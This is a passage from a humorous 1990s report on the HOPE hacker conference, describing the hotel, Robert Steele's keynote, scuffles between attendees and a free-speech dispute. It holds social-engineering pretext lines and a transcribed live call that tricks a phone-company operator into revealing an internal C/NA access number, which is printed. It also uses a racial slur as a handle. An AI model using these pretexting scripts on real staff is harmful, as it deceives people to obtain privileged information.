eyes instantly clear, the blood pressure sinks by 50% and already the first conflict of the day
has been waged and won.
Welcome to the Big Apple, and remember never, ever, to say, "Have a Nice Day." Oh, no.
Never.
So HOPE was bound to be radically different from Vegas's DefCon II, if only for the setting.
But, I expected hard core. The European contingent will be there, as will Israel and South
America and even the Far East. All told, I am told, 1000 or more are expected. And again, as
at DefCon II, I am to speak, but Eric/Emmanuel never told me about what, when, or any of the
other niceties that go along with this thing we call a schedule.
* * * * *
God, I hate rushing.
Leaving Vienna at 3:15 for a 4PM Amtrak "put your life in their hands" three hour trip to New
York is not for the faint of heart. My rented Hyundai four cylinder limousine wound up like a
sewing machine to 9,600 RPM and hydroplaned the bone dry route 66 into the pot holed,
traffic hell of Friday afternoon Washington, DC. Twelve minutes to spare.
I made the 23 mile trip is something less than three minutes and bounded into the Budget rental
return, decelerated to impulse power and let my brick and lead filled suitcase drop to the
pavement with a dent and a thud. "Send me the bill," I hollered at the attendant. Never mind
that Budget doesn't offer express service like real car rental companies. "Just send me the bill!"
and I was off.
Eight minute to spare. Schlepp, schlepp. Heavy, heavy.
Holy shit! Look at the line for tickets and I had reservations.
"Is this the line for the four o'clock to New York?" Pant, breathless.
"Yeah." She never looked up.
"Will they hold the train?"
"No." A resoundingly rude no at that. Panic gene takes over.
"What about the self-ticketing computer?" I said pointing at the self ticketing computer.
"Do you have a reservation?"
"Yup." Maybe there is a God.
"Won't help you."
"What?"
Nothing.
"What do you mean won't help?"
"Computer's broken." Criminy! I have 4 minutes and here's this over-paid over-attituded
Amtrak employee who thinks she's the echo of Whoopi Goldberg. "The line's over there."
Have you ever begged? I mean really begged? Well I have.
"Are you waiting for the four?" "Can I slip ahead?" "Are you in a death defying hurry?" "I'll
give you a dime for your spot in line." "You are so pretty for 76, ma'am. Can I sneak ahead?"
Tears work. Two excruciating minutes to go. I bounced ahead of everyone in a line the length
of the Great Wall of China, got my tickets and tore ass through Union Station The closing
gate missed me but caught the suitcase costing me yet more time as I attempted to disgorge my
now-shattered valise from the fork-lift- like spikes which protect the trains from late-coming
commuters. The rubber edged doors on the train itself were kinder and gentler, but at this
point, screw it. It was Evian and Fritos for the next three hours.
* * * * *
Promises tend to be lies. The check is in the mail; Dan Quayle will learn to spell; I won't raise
taxes. I wonder about HOPE.
"It's going to be Bust Central," said one prominent hacker who threatened me with electronic
assassination if I used his name. "Emmanuel will kill me." Apparently the authorities-who-be
are going to be there in force. "They want to see if Corrupt or any of the MoD crew stay after
dark, then Zap! Back to jail. (giggle, giggle.) I want to see that."
Will Mitnick show up? I'd like to talk to that boy. A thousand hackers in one place and
Eric/Emmanuel egging on the Feds to do something stupid. Agent Steal will be there, or
registered at least, and half of the folks I know going are using aliases.
"I'd like a room please."
"Yessir. Name?"
"Monkey Meat."
"Is that your first or last name?"
"First."
"Last name?"
"Dilithium Crystal."
"Could you spell that?"
Now: I know the Hotel Pennsylvania. It used to be the high class Statler Hilton until Mr.
Hilton himself decided that the place was beyond hope. "Sell it or scuttle it." They sold and
thus begat the hotel Filthadelphia. I stayed here once in 1989 and it was a cesspool then. I
wondered why the Farsi-fluent bellhop wouldn't tell me how bad the damage was from the fire
bombed 12th floor. The carpets were the same dingy, once upon a time colorful, drab as I
remembered. And, I always have a bit of trouble with a hotel who puts a security check by the
elevator bank. Gives you the warm and fuzzies that make you want to come back right away.
I saved $2 because none of the bell hops noticed I needed help, but then again, it wouldn't have
mattered for there was no way he and I and my luggage were going to fit inside of what the
hotel euphemistically refers to as a 'room'. Closet would be kind but still inaccurate. I think
the word, ah, '$95 a night slum' might still be overly generous. Let's try . . . ah ha! the room
that almost survived the fire bombing. Yeah, that's the ticket.
The walls were pealing. Long strips of yellowed antique wallpaper embellished the flatness of
the walls as they curled towards the floor and windows. The chunks of dried glue decorated
the pastel gray with texture and the water stains from I know not where slithered their way to
the soggy carpet in fractal patterned rivulets. I stood in awe at early funk motif that the Hotel
Filthadelphia chose in honor of my attendance at HOPE. But, no matter how bad my room
was, at least it was bachelor clean. (Ask your significant other what that means. . .)
In one hacker's room no bigger than mine I counted 13 sleeping bags lying amongst the
growing mold at the intersection of the drenched wallboard and putrefying carpet shreds. (God,
I love going to hacker conferences! It's not that I like Hyatt's and Hilton' all that much: I do
prefer the smaller facilities, but, I am sad to admit, clean counts at my age.). My nose did not
have to venture towards the floor to be aware that the Hotel Filthadelphia was engaging in top
secret exobiological government experiments bent on determining their communicability and
infection factor.
The top floor of the Hotel Filthadelphia - the 18th - was the place for HOPE, except the
elevator door wouldn't open. The inner door did, but even with the combined strength of my
personal crowbar (a New York defensive measure only; I never use it at home) and three
roughians with a bad case of Mexican Claustrophobia, we never got the door open.
The guard in the lobby was a big help.
"Try again."
Damned if he didn't know his elevators and I emerged into the pre-HOPE chaos of preparing
for a conference.
About 100 hackers lounged around in varying forms of disarray - Hey Rop!
Rop Gongrijjp editor of the Dutch Hacktic is a both a friend and an occasional source of
stimulating argument. Smart as a whip, I don't always agree with him, though, the above-
ground security types ought to talk to him for a clear, concise and coherent description of the
whys and wherefores of hacking.
Hey Emmanuel! Hey Strat! Hey Garbage Heap! Hey Erikb! Hey to lots of folks. Is that you
Supernigger? And Julio? I was surprised. I knew a lot more of these guys that I thought I did.
Some indicted, some unindicted, some mere sympathizers and other techno-freaks who enjoy a
weekend with other techno-freaks. Security dudes - get hip! Contact your local hacker and
make friends. You'll be glad you did.
From behind - got me. My adrenaline went into super-saturated mode as I was grabbed. I
turned and it was . . . Ben. Ben is a hugger. "I just wanted to hug you," he said sweetly but
without the humorous sexually deviant connotation that occurred during Novocain's offer to let
Phil Zimmerman sleep with him in Las Vegas.
I smiled a crooked smile. "Yeah, right." Woodstock '94 was a mere 120 miles away . . .maybe
there was a psychic connection. But Ben was being sincere. He was hugging everyone.
Everyone. At 17, he really believes that hugging and hacking are next to Godliness. Boy does
he have surprise coming the first time his mortgage is late. Keep hugging while you have the
chance, Ben.
Assorted cases of Zima (the disgusting Polish is-this-really-lime flavored beer of choice by
those without taste buds) appeared, but anyone over the age of 21 drank Bud. What about the
12 year olds drinking? And the 18 year olds? And the 16 year olds?
"Rop, I don't think you need to give the hotel an excuse to bust you guys outta here." Me,
fatherly and responsible? Stranger things have happened. The beer was gone. I'm not a
teetotaler, but I didn't want my weekend going up in flames because of some trashed 16 year
old puking on an Irani ambassador in the lobby. No reason to test fate.
* * * * *
Nothing worked, but that's normal.
Rop had set up HEU (Hacking at the End of the Universe) in Holland last year with a single
length of 800m ethernet. (That's meter for the Americans: about 2625 ft.) HOPE, though was
different. The Hotel Filthadelphia's switchboard and phone systems crashed every half hour or
so which doesn't do a lot for the health of 28.8 slip lines.
The object of the exercise was seemingly simple: plug together about 20 terminals into a
terminal server connected to Hope.Com and let 'em go at it. Provide 'net access and, to the
lucky winner of the crack-the-hopenet server (root) the keys to a 1994 Corvette!
You heard it right! For breaking into root of their allegedly secure server, the folks at 2600 are
giving away keys to a 1994 Corvette. They don't know where the car is, just the keys. But
they will give you the car's last known location . . . or was it $50 in cash?
Erikb - Chris Goggans - showed up late Friday night in disguise: a baseball cap over his nearly
waist length dirty blond hair. "He's here!" one could hear being muttered. "He had the balls to
show up!" "He's gonna get his ass kicked to a pulp." "So you did come . . . I was afraid they'd
intimidated you to stay in Texas."
No way! "Why tell the enemy what your plans are." Even the 50's- something ex-
amphetamine-dealer turned reseller of public-records Bootleg didn't know Goggans was going
to be there. But the multiple fans of Erikb, (a strong resemblance to Cyber Christ if he do say
so himself) were a-mighty proud to see him.
This stunning Asian girl with skin too soft to touch (maybe she was 14, maybe she was 25)
looked at Erikb by the message board. "You're," she pointed in disbelief "Erikb?" Chris nods,
getting arrogantly used to the respectful adulation. Yeah, that's me, to which the
lady/girl/woman instantly replied, "You're such an asshole." Smile, wide smile, hug, kiss, big
kiss. Erikb revels in the attention and hundreds of horny hackers jealously look on.
Friday night was more of an experience - a Baba Ram Dass-like Be Here Now experience -
with mellow being the operative word. The hotel had apparently sacrificed 20,000 square feet
of its penthouse to hackers, but it was obvious to see they really didn't give a damn if the whole
floor got trashed. Ceiling panels dripped from their 12 foot lofts making a scorched Shuttle
underbelly look pristine. What a cesspool! I swear nothing had been done to the decorative
environs since the day Kennedy was shot. But kudos to Emmanuel for finding a centrally
located cesspool that undoubtedly gave him one hell of a deal. I think it would be a big mistake
to hold a hacker conference at the Plaza or some such snooty overly-self-indulgent denizen of
the rich.
Filth sort of lends credibility to an event that otherwise seeks notoriety.
I didn't want to take up too much of Emmanuel's and Rop's time - they were in setup panic - so
it was off to the netherworld until noon. That's when a civilized Con begins.
* * * * *
I dared to go outside; it was about 11AM and I was in search of the perfect New York
breakfast: a greasy spoon that serves coffee as tough as tree bark and a catatonia inducing egg
and bacon sandwich. Munch, munch, munch on that coffee.
I'd forgotten how many beggars hang out on the corner of 33rd and 7th, all armed with the
same words, "how about a handout, Winn?" How the hell do they know my name? "Whatever
you give will come back to you double and triple . . . please man, I gotta eat." It is sad, but
John Paul Getty I ain't.
As I munched on my coffee and sipped my runny egg-sandwich I noticed that right in front of
the runny-egg-sandwich place sat a Ford Econoline van. Nice van. Nice phone company van.
What are they doing here? Oh, yeah, the hackers need lines and the switchboard is down. Of
course, the phone company is here. But, what's that? Hello? A Hacker playing in the phone
van? I recognize you! You work with Emmanuel. How? He's robbing it. Not robbing, maybe
borrowing.
The ersatz telephone van could have fooled anyone - even me, a color blind quasi-techno-
weanie to yell "Yo! Ma Bell!" But, upon not-too-closer inspection, the TPC (The Phone
Company) van was in fact a 2600 van - straight from the minds of Emmanuel and friends.
Impeccable! The telephone bell in a circle logo is, in this case, connected via cable to a hacker
at a keyboard. The commercial plates add an additional air of respectability to the whole
image. It works.
* * * * *
Up to HOPE - egg sandwich and all.
The keynote speech was to be provided courtesy of the Man in Blue. Scheduled for noon,
things were getting off to a late start. The media (who were there in droves, eat your heart out
CSI) converged on the MIB to see who and why someone of his stature would (gasp!)
appear/speak at a funky-downtown hotel filled with the scourges of Cyberspace. I didn't see if
Ben hugged the MIB, but I would understand if he didn't. Few people knew him or suspected
what size of Jim-Carey-MASK arsenal might suddenly appear if a passive hug were
accidentally interpreted as being too aggressive. The MIB is imposing and Ben too shy.
The media can ask some dumb questions and write some dumb articles because they spend 12
1/2 minutes trying to understand an entire culture. Can't do that fellows!
The MIB, though, knows hackers and is learning about them more and more; and since he is
respectable, the media asks him about hackers. What are hackers? Why are YOU here, Mr.
MIB?
"Because they have a lot to offer. They are the future," the Man In Blue said over and over.
Interview after interview - how time flies when you're having fun - and the lights and cameras
are rolling from NBC and PIX and CNN and assorted other channels and magazines. At 12:55
chaos had not settled down to regimented disorganization and the MIB was getting antsy.
After all, he was a military man and 55 minutes off schedule: Egad! Take charge.
The MIB stood on a chair and hollered to the 700+ hacker phreaks in the demonstration
ballroom, "Hey! It's starting. Let's go the theater and get rocking! Follow me." He leaned over
to me: "Do you know where the room is?"
"Sure, follow me."
"Everyone follow, c'mon," yelled the MIB. "I'm going to get started in exactly three minutes,"
and three minutes he meant. Despite the fact that I got lost in a hallway and had hundreds of
followers following my missteps and the MIB yelling at me for getting lost in a room with only
two doors, we did make the main hall, and within 90 seconds he took over the podium and
began speaking.
"I bet you've always wanted to ask a spy a few questions. Here's your chance. But let me say
that the United States intelligence community needs help and you guys are part of the
solution." The MIB was impeccably dressed in his pin stripe with only traces of a Hackers 80
T-shirt leaking through his starched white dress shirt. The MIB is no less than Robert Steele,
ex-CIA type spy, senior civilian in Marine Corps Intelligence and now the President of Open
Source Solutions, Inc.
He got these guys (and gals) going. Robert doesn't mince words and that's why as he puts it,
he's "been adopted by the hackers." At his OSS conferences he has successfully juxtaposed
hackers and senior KGB officials who needed full time security during their specially arranged
48 hour visa to Washington, DC. He brought Emmanuel and Rop and clan to his show and
since their agendas aren't all that different, a camaraderie was formed.
Robert MIB Steele believes that the current intelligence machinery is inadequate to meet the
challenges of today's world. Over 80% of the classified information contained with the
Byzantine bowels of the government is actually available from open sources. We need to
realize that the future is more of an open book than ever before.
We classify newspaper articles from Peru in the incredibly naive belief that only Pentagon
spooks subscribe. We classify BBC video tapes from the UK with the inane belief that no one
will watch it if it so stamped. We classify $4 Billion National Reconnaissance Office satellite
generated street maps of Calle, Colombia when anyone with an IQ only slightly above a rock
can get the same one from the tourist office. And that's where hackers come in.
"You guys are a national resource. Too bad everyone's so scared of you." Applause from
everywhere. The MIB knows how to massage a crowd. Hackers, according to Steele, and to a
certain extent I agree, are the truth tellers "in a constellation of complex systems run amok and
on the verge of catastrophic collapse."
Hackers are the greatest sources of open source information in the world. They have the
navigation skills, they have the time, and they have the motivation, Robert says. Hackers
peruse the edges of technology and there is little that will stop them in their efforts. The
intelligence community should take advantage of the skills and lessons that the hackers have to
teach us, yet as we all know, political and social oppositions keep both sides (who are really
more similar then dissimilar) from talking.
"Hackers put a mirror up to the technical designers who have built the networks, and what they
see, they don't like. Hackers have shown us all the chinks in the armor of a house without
doors or windows. The information infrastructure is fragile and we had better do something
about it now; before it's too late."
Beat them at their own game, suggests Steele. Keep the doors of Cyberspace open, and sooner
or later, the denizens of the black holes of information will have to sooner or late realize that
the cat is out of the bag.
Steele educated the Hacker crowd in a way new to them: he treated them with respect, and in
turn he opened a channel of dialog that few above ground suit-types have ever envisioned.
Steele works at the source.
HOPE had begun and Robert had set the tone.
* * * * *
The day was long. Dogged by press, hackers rolled over so the reporters could tickle their
stomachs on camera. Despite their public allegations that the media screws it up and never can
get the story right, a camera is like a magnet. The New York Times printed an article about
HOPE so off the wall I wondered if the reporter had actually been there. Nonetheless, the
crowds followed the cameras, the cameras followed the crowds, and the crowds parted like the
Red Sea. But these were mighty colorful crowds.
We all hear of that prototypical image of the acne faced, Jolt- drinking, pepperoni downing
nerdish teenager who has himself locked in the un-air-conditioned attic of his parents' half
million dollar house from the time school gets out till the sun rises. Wrongo security-breath.
Yeah, there's that component, but I was reminded of the '80's, the early '80's by a large percent-
age of the crowd.
Purple hair was present but scarce, and I swear on a stack of 2600's that Pat from Saturday
Night Live was there putting everyone's hormonal guess-machines to the test. But what cannot
help but capture one's attention is a 40 pin integrated circuit inserted into the shaved side skull
of an otherwise clean-cut Mohawk haircut.
The story goes that Chip Head went to a doctor and had a pair of small incisions placed in his
skull which would hold the leads from the chip. A little dab of glue and in a few days the skin
would grow back to hold the 40 pins in the natural way; God's way.
There was a time that I thought ponytails were 'out' and passe, but I thought wrong. Mine got
chopped off in roughly 1976 down to shoulder length which remained for another six years,
but half of the HOPE audience is the reason for wide spread poverty in the hair salon industry.
Nothing wrong with long, styled, inventive, outrageous hair as long as it's clean; and with
barely an exception, such was the case. In New York it's not too hard to be perceived as clean,
especially when you consider the frame of reference. Nothing is too weird.
The energy level of HOPE was much higher than the almost lethargic (but good!) DefCon II.
People move in a great hurry, perhaps to convey the sense of importance to others, or just out
of frenetic hyperactivity. Hackers hunched over their keyboards - yet with a sense of urgency
and purpose. Quiet yet highly animated conversations in all corners. HOPE staff endlessly
pacing throughout the event with their walkie-talkies glued to their ears.
Not many suit types. A handful at best, and what about the Feds? I was accosted a few times
for being a Fed, but word spread: no Fed, no bust. Where were the Feds? In the lobby. The
typical NYPD cop has the distinctive reputation of being overweight especially when he
wearing two holsters - one for the gun and one for the Italian sausage. Perpetually portrayed as
donut dunking dodo's, some New York cops' asses are referred to as the Fourth Precinct and a
few actually moonlight as sofas.
So rather than make a stink, (NY cops hate to make a scene) the lobby of the Hotel
Filthadelphia was home to the Coffee Clutch for Cops. About a half dozen of them made their
profound presence known by merely spending their day consuming mass quantities of
questionable ingestibles, but that was infinitely preferable to hanging out on the 18th floor.
The hackers weren't causing any trouble, the cops knew that, so why push it. Hackers don't
fight, they hack. Right?
After hours of running hours behind schedule, the HOPE conference was in first place for
disorganized, with DefCon II not far behind. Only with 1000 people to keep happy and in the
right rooms, chaos reigns sooner. The free Unix sessions and Pager session and open
microphone bitch session and the unadulterated true history of 2600 kept audiences of several
hundred hankering for more - hour after hour.
Over by the cellular hacking demonstrations, I ran into a hacker I had written about: Julio,
from the almost defunct Masters of Destruction. Julio had gone state's evidence and was
prepared to testify against MoD ring leader Mark Abene (aka Phiber Optik) but once Mark
pled guilty to enough crimes to satisfy the Feds, Julio was off the hook with mere probation.
Good guy, sworn off of hacking. Cell phones are so much more interesting.
However, while standing around with Erikb and a gaggle of Cyber Christ wanna-bes, Julio and
his friend (who was the size of Texas on two legs) began a pushing match with Goggans. "You
fucking narc red-neck son of a bitch." Goggans helped build the case against the MoD and
didn't make a lot of friends in the process.
The shoving and shouldering reminded me of slam dancing from decades past, but these kids
are too young to have taken part in the social niceties of deranged high speed propulsion and
revulsion on the dance floor. So it was a straight out pushing match, which found Erikb doing
his bloody best to avoid. Julio and pal kept a'coming and Erikb kept avoiding. It took a dozen
of us to get in the middle and see that Julio was escorted to the elevators.
Julio said Corrupt, also of the MoD, was coming down to HOPE, too. Corrupt has been
accused of mugging drug dealers to finance his computer escapades, and was busted along with
the rest of the MoD gang. The implied threat was taken seriously, but, for whatever reason,
Corrupt never showed. It is said that the majority of the hacking community distances itself
from him; he's not good for the collective reputation. So much for hacker fights. All is calm.
The evening sessions continued and continued with estimates of as late as 4AM being bandied
about. Somewhere around 1:00AM I ran into Bootleg in the downstairs bar. Where was
everybody? Not upstairs. Not in the bar. I saw a Garbage Heap in the street outside (now
that's a double entendre) and then Goggans popped up from the door of the Blarney Stone, a
syndicated chain of low- class Irish bars that serve fabulously thick hot sandwiches.
"We're about to get thrown out."
"From the Blarney Stone? That's impossible. Drunks call the phone booths home!"
Fifty or so hacker/phreaks had migrated to the least likely, most anachronistic location one
could imagine. A handful of drunken sots leaning over their beers on a stain encrusted wooden
breeding ground for salmonella. A men's room that hasn't seen the fuzzy end of a brush for the
best part of a century made Turkish toilets appear refreshingly clean. And they serve food
here.
I didn't look like a hacker so I asked the bartender, "Big crowd, eh?"
The barrel chested beer bellied barman nonchalantly replied, "nah. Pretty usual." He cleaned a
glass so thoroughly the water marks stood out plainly.
"Really? This much action on a Saturday night on a dark side street so questionably safe that
Manhattan's Mugger Society posts warnings?"
"Yup."
"So," I continued. "These hackers come here a lot?"
"Sure do," he said emphatically.
"Wow. I didn't know that. So this is sort of a hacker bar, you might say?"
"Exactly. Every Saturday night they come in and raise a little hell."
With a straight face I somehow managed to thank the confused barman for his help and for the
next four hours learned that socially, hackers of today are no different than many if not most of
us were in our late teens ad early twenties. We laughed and joked and so do they - but there is
more computer talk. We decried the political status of our day as they do theirs, albeit they
with less fervor and more resignation. The X-Generation factor: most of them give little more
than a tiny shit about things they view as being totally outside their control, so why bother.
Live for today.
Know they enemy. Robert hung in with me intermingling and arguing and debating and
learning from them, and they from us. Hackers aren't the enemy - their knowledge is - and
they are not the exclusive holders of that information. Information Warfare is about
capabilities, and no matter who possesses that capability, there ought to be a corresponding
amount respect.
Indeed, rather than adversaries, hackers could well become government allies and national
security assets in an intense international cyber-conflict. In the LoD/MoD War of 1990-91,
one group of hackers did help authorities. Today many hackers assist professional
organizations, governments in the US and overseas - although very quietly. 'Can't be seen
consorting with the enemy.' Is hacking from an Army or Navy or NATO base illegal?
Damned if I know, but more than one Cyber Christ-like character makes a tidy sum providing
hands-on hacking education to the brass in Europe.
Where these guys went after 5AM I don't know, but I was one of the first to be back at the
HOPE conference later that day; 12:30 PM Sunday.
* * * * *
The Nazi Hunters were out in force.
"The Neo-Nazi skinheads are trying to start another Holocaust." A piercing, almost annoying
voice stabbed right through the crowds. "Their racist propaganda advocates killing Jews and
blacks. They have to be stopped, now."
Mortechai Levy (I'll call him Morty) commanded the attention of a couple dozen hackers.
Morty was a good, emotional, riveting shouter. "These cowardly bastards have set up vicious
hate call lines in over 50 cities. The messages advocate burning synagogues, killing minorities
and other violence. These phones have to be stopped!"
The ever-present leaflet from Morty's Jewish Defense Organization asked for help from the
2600 population.
"Phone freaks you must use your various assorted bag of tricks to shut these lines down.
No cowardly sputterings about 'free speech' for these fascist scum."
The headline invited the hacker/phreak community to:
"Let's Shut Down 'Dial-A-Nazi'!!!"
Morty was looking for political and technical support from a band of nowhere men and women
who largely don't know where they're going much less care about an organized political
response to someone elses cause. He wasn't making a lot of headway, and he must have know
that he would walk right into the anarchist's bible: the 1st amendment.
The battle lines had been set. Morty wanted to see the Nazis censored and hackers are absolute
freedom of speechers by any measure. Even Ben sauntering over for a group hug did little to
defuse the mounting tension.
I couldn't help but play mediator. Morty was belligerently loud and being deafeningly intrusive
which affected the on-going sessions. To tone it down some, we nudged Morty and company
off to the side and occupied a corner of thread bare carpet, leaning against a boorish beige wall
that had lost its better epidermis.
The heated freedom of speech versus the promotion of racial genocide rancor subdued little
even though we were all buns side down. I tried to get a little control of the situation.
"Morty. Answer me this so we know where you're coming from. You advocate the silencing of
the Nazis, right?
"They're planning a new race war; they have to be stopped."
"So you want them silenced. You say their phones should be stopped and that the hackers
should help."
"Call that number and they'll tell you that Jews and blacks should be killed and then they . . ."
"Morty. OK, you want to censor the Nazis. Yes or No."
"Yes."
"OK, I can understand that. The question really is, and I need your help here, what is the line
of censorship that you advocate. Where is your line of legal versus censored?"
A few more minutes of political diatribe and then he got to the point. "Any group with a
history of violence should be censored and stopped." A little imagination and suddenly the
whole planet is silenced. We need a better line, please. "Hate group, Nazis, people who
advocate genocide . . . they should be silenced . . . ."
"So," I analyzed. "You want to establish censorship criteria based upon subjective
interpretation. Whose interpretation?" My approach brought nods of approval.
One has to admire Morty and his sheer audacity and tenacity and how much he strenuously and
single-mindedly drives his points home. He didn't have the ideal sympathetic audience, but he
wouldn't give an inch. Not an inch. A little self righteousness goes a long way; boisterous
extremism grows stale. It invites punitive retorts and teasing, or in counter-culture jargon,
"fucking with their heads."
Morty (perhaps for justifiable reasons) was totally inflexible and thus more prone to verbal
barbing. "You're just a Jewish racist. Racism in reverse," accused one jocular but definitely
lower middle class hacker with an accent thicker than all of Brooklyn.
Incoming Scuds! Look out! Morty went nuts and as they say, freedom of speech ends when
my fists impacts upon your nose. Morty came dangerously close to crossing that line. Whoah,
Morty, whoah. He's just fucking with your head. The calm-down brigade did its level best to
keep these two mortals at opposite ends of the room.
"You support that Neo Nazi down there; you're as bad as the rest!" Morty said. "See what I
have to tolerate. I know him, we've been keeping track of him and he hangs out with the son
of the Grand Wizard of Nazi Oz." The paranoid train got on the tracks.
"Do you really know the Big Poo-bah of Hate?" I asked the hacker under assault and now
under protective custody.
"Yeah," he said candidly. "He's some dick head who hates everyone. Real jerk."
"So what about you said to Morty over there?"
"Just fucking with his head. He gets a little extreme." So we had in our midst the Al Sharpton
of the Jewish faith. Ballsy. Since Morty takes Saturday's off by religious law, he missed the
press cavalcade, but as a radical New York fixture, the media probably didn't mind too much.
I was off to sessions, Morty found new audiences as they came off the elevators, and the band
played on.
* * * * *
In my humble 40-something opinion, the best session of HOPE was the one on social
engineering.
The panel consisted of only Emmanuel, Supernigger (social engineer par excellence) and
Cheshire Catalyst. The first bits were pretty staid dry conventional conference (ConCon)
oriented, but nonetheless, not the kind of info that you expect to find William H. Murray,
Executive Consultant handing out.
The best social engineers make friends of their victims. Remember: you're playing a role.
Think Remington Steele.
Schmooze! "Hey, Jack did you get a load of the blond on Stern last night?"
Justifiable anger: "Your department has caused nothing but headaches. These damn new
computers/phones/technology just don't work like the old ones. Now either you help me now
or I'm going all the way to Shellhorn and we'll what he says about these kinds of screwups." A
contrite response is the desired effect.
Butt headed bosses: "Hey, my boss is all over my butt, can you help me out?"
Management hatred: "I'm sitting here at 3PM working while management is on their yachts.
Can you tell me . . .?"
Giveaways: "Did you know that so and so is having an affair with so and so? It's true, I swear.
By the way, can you tell me how to . . ."
Empathy: "I'm new, haven't been to the training course and they expect me to figure this out all
by myself. It's not fair."
Thick Accent: "Hi. Dees computes haf big no wurk. Eet no makedah passurt. Cunu help? Ah,
tanku." Good for a quick exchange and a quick good-bye. Carefully done, people want you off
the phone quickly.
Billsf, the almost 40 American phreak who now calls Amsterdam home was wiring up
Supernigger's real live demonstration of social engineering against Sprint. A dial tone came
over the PA system followed by the pulses to 411.
"Directory Assistance," the operator's male voice was squeezed into a mere three kilohertz
bandwidth.
Suddenly, to the immense pleasure of the audience, an ear-splitting screech a thousand times
louder than finger nails on a chalk board not only belched across the sound system but caused
instant bleeding in the ears of the innocent but now deaf operator. . Billsf sheepishly grinned.
"Just trying to wire up a mute button."
Three hundred people in unison responded: "It doesn't work." No shit.
While Billsf feverishly worked to regain his reputation, Supernigger explained what he was
going to do. The phone companies have a service, ostensibly for internal use, called a C/NA.
Sort of a reverse directory when you have the number but want to know who the number
belongs to and from whence it comes. You can understand that this is not the sort of feature
that the phone company wants to have in the hands of a generation of kids who are so apathetic
that they don't even know they don't give a shit. Nonetheless, the access to this capability is
through an 800 number and a PIN.
Supernigger was going to show us how to acquire such privileged information. Live. "When
you get some phone company person as dumb as a bolt on the other end, and you know a few
buzz words. you convince them that it is in their best interest and that they are supposed to give
you the information."
"I've never done this in front of an audience before, so give me three tries," he explained to an
anxiously foaming at the mouth crowd. No one took a cheap pot shot at him: tacit acceptance
of his rules.
Ring. Ring.
"Operations. Mary."
"Mary. Hi, this is Don Brewer in social engineering over at CIS, how's it going?" Defuse.
"Oh, fine. I guess."
"I know, I hate working Sundays. Been busy?"
"Nah, no more. Pretty calm. How can I help you?"
"I'm doing a verification and I got systems down. I just need the C/NA. You got it handy?"
Long pause.
"Sure, lemme look. Ah, it's 313.424.0900." 700 notebooks appeared out of nowhere,
accompanied by the sound of 700 pens writing down a now-public phone number.
"Got it. Thanks." The audience is gasping at the stunningly stupid gullibility of Mary. But
quiet was essential to the mission.
"Here's the PIN number while we're at it." Double gasp. She's offering the supposedly super
secret and secure PIN number? Was this event legal? Had Supernigger gone over the line?
"No, CIS just came up. Thanks anyway."
"Sure you don't need it?"
"Yeah. Thanks. Bye." Click. No need to press the issue. PIN access might be worth a close
look from the next computer DA wanna-be.
An instant shock wave of cacophonous approval worked its way throughout the 750 seat
ballroom in less than 2 microseconds. Supernigger had just successfully set himself as a
publicly ordained Cyber Christ of Social Engineering. His white robes were on the way.
Almost a standing ovation lasted for the better part of a minute by everyone but the narcs in the
audience. I don't know if they were telco or Feds of whatever, but I do know that they were
the stupidest narcs in the city of New York. This pair of dour thirty something Republicans had
sphincters so tight you could mine diamonds out of their ass.
Arms defiantly and defensively crossed, they were stupid enough to sit in the third row center
aisle. They never cracked a smile at some of the most entertaining performances I have seen
outside of the giant sucking sound that emanates from Ross Perot's ears.
Agree or disagree with hacking and phreaking, this was funny and unrehearsed ad lib material.
Fools. So, for fun, I crawled over the legs of the front row and sat in the aisle, a bare eight feet
from the narcs. Camera in hand I extended the 3000mm tele-photo lens which can distinguish
the color of a mosquitoes underwear from a kilometer and pointed it in their exact direction.
Their childhood acne scars appeared the depth of the Marianna Trench. Click, and the flash
went off into their eyes, which at such a short distance should have caused instant blindness.
But nothing. No reaction. Nada. Cold as ice. Rather disappointing, but now we know that
almost human looking narc-bots have been perfected and are being beta tested at hacker cons.
Emmanuel Goldstein is very funny. Maybe that's why Ed Markey and he get along so well.
His low key voice rings of a gentler, kinder sarcasm but has a youthful charm despite that he is
30- something himself.
"Sometimes you have to call back. Sometimes you have to call over and over to get what you
want. You have to keep in mind that the people at the other end of the phone are generally not
as intelligent as a powered down computer." He proceeded to prove the point.
Ring ring,
"Directory Assistance."
"Hi."
"Hi."
"Hi."
"Can I help you."
"Yes."
Pause.
"Hello?"
"Hi."
"Hi."
"Can I help you.:
"OK."
Shhhhh. Ssshhh. Quiet. Shhhh. Too damned funny for words.
"Directory Assistance."
"I need some information."
"How can I help you."
"Is this where I get numbers?"
"What number would you like?"
"Information."
"This is information."
"You said directory assistance."
"This is."
"But I need information."
"What information do you need?"
"For information."
"This is information."
"What's the number?"
"For what?"
"Information."
"This is directory assistance."
"I need the number for information."
Pause. Pause.
"What number do you want?"
"For information."
Pause. Guffaws, some stifled, some less so. Funny stuff.
"Hold on please."
Pause.
"Supervisor. May I help you?"
"Hi."
"Hi."
Pause.
"Can I help you?"
"I need the number for information."
"This is directory assistance."
"Hi."
"Hi."
"What's the number for information?"
"This is information."
"What about directory assistance?"
"This is directory assistance."
"But I need information."
"This is information."
"Oh, OK. What's the number for information?"
Pause.
"Ah 411."
"That's it?"
"No. 555.1212 works too."
"So there's two numbers for information?"
"Yes."
"Which one is better?" How this audience kept its cool was beyond me. Me and my
compatriots were beside ourselves.
Pause.
"Neither."
"Then why are there two?"
Pause.
"I don't know."
"OK. So I can use 411 or 555.1212."
"That's right."
"And which one should I use?"
Pause.
"411 is faster." Huge guffaws. Ssshhhh. Ssshhhh..
"Oh. What about the ones?"
"Ones?"
"The ones."
"Which ones?"
"The ones at the front of the number."
"Oh, those ones. You don't need ones. Just 411 or 555.1212.."
"My friends say they get to use ones." Big laugh. Shhhhhh.
"That's only for long distance."
"To where?" How does he keep a straight face?
Pause.
"If you wanted 914 information you'd use a one."
"If I wanted to go where?"
"To 914?"
"Where's that?"
"Westchester."
"Oh, Westchester. I have friends there."
Pause.
"Hello?"
"Yes?"
"So I use ones?"
"Yes. A one for the 914 area."
"How?"
Pause.
"Put a one before the number."
"Like 1914. Right?"
"1914.555.1212."
"All of those numbers?"
"Yes."
"That's three ones."
"That's the area code."
"I've heard about those. They confuse me." Rumbling chuckles and laughs throughout the
hall.
Pause.
She slowly and carefully explained what an area code is to the howlingly irreverent amusement
of the entire crowd except for the fool narcs.
"Thanks. So I can call information and get a number?"
"That's right."
"And there's two numbers I can use?"
"Yes."
"So I got two numbers on one call?"
"Yeah . . ."
"Wow. Thanks. Have a nice day."
* * * * *
Comments heard around HOPE.
Rop Gongrijjp, Hacktic: "The local phone companies use their own social engineers when they
